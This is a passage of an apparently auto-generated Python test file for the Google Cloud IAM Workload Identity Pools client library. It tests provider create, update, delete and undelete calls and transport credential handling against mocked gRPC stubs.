            operations_pb2.Operation(name='operations/spam')
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workload_identity_pool_provider(
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].workload_identity_pool_provider_id == 'workload_identity_pool_provider_id_value'
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workload_identity_pool_provider(
workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest(),
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
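# Usage sketch for the methods exercised above (assumes real credentials and
# an existing pool; not collected or executed by pytest): each mutation
# returns a long-running operation, so callers typically block on .result().
def _example_create_provider(client, parent):
    operation = client.create_workload_identity_pool_provider(
        parent=parent,
        workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
        workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
    )
    return operation.result()  # blocks until the LRO completes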
def test_update_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_update_workload_identity_pool_provider_from_dict():
test_update_workload_identity_pool_provider(request_type=dict)
def test_update_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
client.update_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_async_from_dict():
await test_update_workload_identity_pool_provider_async(request_type=dict)
def test_update_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
request.workload_identity_pool_provider.name = 'workload_identity_pool_provider.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool_provider.name=workload_identity_pool_provider.name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest()
request.workload_identity_pool_provider.name = 'workload_identity_pool_provider.name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.update_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'workload_identity_pool_provider.name=workload_identity_pool_provider.name/value',
) in kw['metadata']
def test_update_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_workload_identity_pool_provider(
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_workload_identity_pool_provider(
workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest(),
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name='operations/spam')
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_workload_identity_pool_provider(
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_workload_identity_pool_provider(
workload_identity_pool.UpdateWorkloadIdentityPoolProviderRequest(),
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
)
def test_delete_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workload_identity_pool_provider_from_dict():
test_delete_workload_identity_pool_provider(request_type=dict)
def test_delete_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
client.delete_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_async_from_dict():
await test_delete_workload_identity_pool_provider_async(request_type=dict)
def test_delete_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.delete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_workload_identity_pool_provider(
workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name='operations/spam')
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_workload_identity_pool_provider(
workload_identity_pool.DeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_undelete_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_undelete_workload_identity_pool_provider_from_dict():
test_undelete_workload_identity_pool_provider(request_type=dict)
def test_undelete_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
client.undelete_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_async_from_dict():
await test_undelete_workload_identity_pool_provider_async(request_type=dict)
def test_undelete_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_undelete_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.undelete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_undelete_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.undelete_workload_identity_pool_provider(
workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name='operations/spam')
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.undelete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.undelete_workload_identity_pool_provider(
workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = WorkloadIdentityPoolsClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.WorkloadIdentityPoolsGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
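# "ADC" above is Application Default Credentials: google.auth.default() walks
# a fixed lookup chain (GOOGLE_APPLICATION_CREDENTIALS, gcloud user
# credentials, then the metadata server) and returns a
# (credentials, project_id) pair. A minimal sketch of the fallback the
# transports rely on:
def _example_adc_fallback():
    credentials, project_id = google.auth.default()
    return credentials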
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.WorkloadIdentityPoolsGrpcTransport,
)
def test_workload_identity_pools_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.WorkloadIdentityPoolsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_workload_identity_pools_base_transport():
# Instantiate the base transport.
with mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.WorkloadIdentityPoolsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'list_workload_identity_pools',
'get_workload_identity_pool',
'create_workload_identity_pool',
'update_workload_identity_pool',
'delete_workload_identity_pool',
'undelete_workload_identity_pool',
'list_workload_identity_pool_providers',
'get_workload_identity_pool_provider',
'create_workload_identity_pool_provider',
'update_workload_identity_pool_provider',
'delete_workload_identity_pool_provider',
'undelete_workload_identity_pool_provider',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
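# A minimal sketch (not the generated source) of the pattern verified above:
# the abstract base transport exposes each RPC as a property whose getter
# raises, so every concrete transport must override the methods it supports.
class _ExampleBaseTransport:
    @property
    def create_workload_identity_pool_provider(self):
        raise NotImplementedError()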
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_workload_identity_pools_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
WorkloadIdentityPoolsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
WorkloadIdentityPoolsClient()
adc.assert_called_once_with(
            scopes=('https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
            default_scopes=('https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
        adc.assert_called_once_with(
            scopes=('https://www.googleapis.com/auth/cloud-platform',),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.WorkloadIdentityPoolsGrpcTransport, grpc_helpers),
(transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_workload_identity_pools_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"iam.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="iam.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
